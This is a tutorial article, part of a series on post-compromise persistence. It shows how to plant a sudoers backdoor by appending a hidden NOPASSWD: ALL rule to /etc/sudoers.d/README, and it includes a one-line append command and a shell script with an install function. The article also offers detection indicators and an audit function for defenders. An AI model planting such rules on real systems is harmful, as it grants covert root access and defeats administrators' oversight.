Series of articles:
Operating system permission maintenance (1) Windows system - sticky keys backdoor
Operating system permission maintenance (2) Windows system - cloned account backdoor
Operating system permission maintenance (3) Windows system - startup item backdoor
Operating system permission maintenance (4) Windows system - scheduled task backdoor
Operating system permission maintenance (5) Windows system - system service backdoor
Operating system permission maintenance (6) Linux system - scheduled task backdoor
Operating system permission maintenance (7) Linux system - SUID backdoor
Operating system permission maintenance (8) Linux system - SSH key backdoor
Operating system permission maintenance (9) Linux system - added user backdoor
Operating system permission maintenance (10) Linux system - SSH symlink backdoor
Operating system permission maintenance (11) Linux system - SSH wrapper backdoor
sudoers backdoor
This backdoor is used to regain root when access to the root account has been lost.
The sudo command lets a permitted user run commands with the privileges of another user, by default root. What sudo permits is governed by the sudoers policy (/etc/sudoers plus the files under /etc/sudoers.d), which specifies which users or groups, on which hosts, may run which commands as which user.
The general form of a rule in /etc/sudoers is:
user host=(runas) command
user: one or more user names, or a group from /etc/group; a group name must be prefixed with %.
host: one or more host names; ALL matches any host.
runas: the user the command runs as; the common values are root and ALL.
command: one or more commands the user or group may run, written as absolute paths (sudo does not accept bare command names here).
For example, hans ALL=(root) /usr/sbin/useradd, /usr/sbin/userdel authorizes the user hans to run useradd and userdel as root on all hosts.
The backdoor is a single line: add an existing low-privilege account (a built-in one, or one we created earlier) to the sudoers policy with the NOPASSWD tag, so that account can quietly run any command as root. The ordinary user then serves as the backdoor.
Rather than touching /etc/sudoers itself, we append the entry to /etc/sudoers.d/README. On Debian-based systems the sudo package ships this file as a comment-only placeholder, already owned by root with mode 0440. sudo's includedir directive parses every file in /etc/sudoers.d except those whose names end in ~ or contain a dot, so README is read as a real policy file, and a rule hidden in a file that looks like documentation is easy to overlook.
Either open the file in an editor while still root:
vim /etc/sudoers.d/README
or append the rule in one command:
sudo su -c "echo 'xiaowang ALL = NOPASSWD: ALL' >> /etc/sudoers.d/README"
Here xiaowang is the ordinary user you will use to regain root after root access is lost. Before relying on the entry, confirm it parses cleanly with visudo -c -f /etc/sudoers.d/README; a syntax error in an included file breaks sudo for everyone, including you.
cat /etc/sudoers.d/README
Now switch to the ordinary user xiaowang to simulate having lost root in a real engagement, and run:
sudo -i
No password is requested, and you are root again. From the defender's side, the same property makes the backdoor easy to find: any non-root NOPASSWD: ALL rule under /etc/sudoers.d, and in particular one inside README, is a strong indicator.
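The steps above as a small POSIX shell helper, added here as an example and not part of the original article. It builds the sudoers line, reproduces sudo's includedir file-name filter so you can see why README is parsed while backup.conf or a file ending in ~ is not, and audits a sudoers.d directory for NOPASSWD: ALL rules (the check a responder would run). The function names are this example's own, and the install function assumes it is run as root on a system with visudo available; the audit function works on any directory you can read.

```shell
#!/bin/sh
# Added example (not from the original article): sudoers backdoor helpers.
# Function names are hypothetical; nothing here runs until a function is called.

# Build the rule for one user. The article writes 'xiaowang ALL = NOPASSWD: ALL',
# which implies runas=root; (ALL) is written out here so the runas field is explicit.
sudoers_line() {
    printf '%s ALL=(ALL) NOPASSWD: ALL\n' "$1"
}

# Mirror sudo's includedir rule: files whose names end in '~' or contain a '.'
# are skipped, everything else is parsed. Returns 0 when sudo would parse it.
includedir_parses() {
    case "$1" in
        *~|*.*) return 1 ;;
        *)      return 0 ;;
    esac
}

# Attacker side (requires root). Appends the rule to a sudoers.d file, keeps the
# 0440 mode sudo demands, and syntax-checks the file so a typo cannot lock sudo.
install_entry() {
    user="$1"
    file="${2:-/etc/sudoers.d/README}"
    sudoers_line "$user" >> "$file"
    chmod 0440 "$file"
    visudo -c -f "$file"
}

# Defender side. Print "file:line:rule" for every non-comment NOPASSWD: ALL rule
# in a sudoers.d directory, considering only files sudo would actually parse.
find_nopasswd_all() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        name="${f##*/}"
        includedir_parses "$name" || continue
        grep -En '^[^#]*NOPASSWD:[[:space:]]*ALL' "$f" | sed "s|^|$name:|"
    done
}

# Usage: AUDIT_DIR=/etc/sudoers.d sh this_script.sh   (as root, to read the directory)
if [ -n "${AUDIT_DIR:-}" ]; then
    find_nopasswd_all "$AUDIT_DIR"
fi
```

Running the audit against /etc/sudoers.d (as root, since the directory is normally 0750) lists offending rules with file name and line number; a hit in README is exactly the artifact this technique leaves behind. The same grep can be pointed at /etc/sudoers itself, which is not in the directory and so is not covered by the loop.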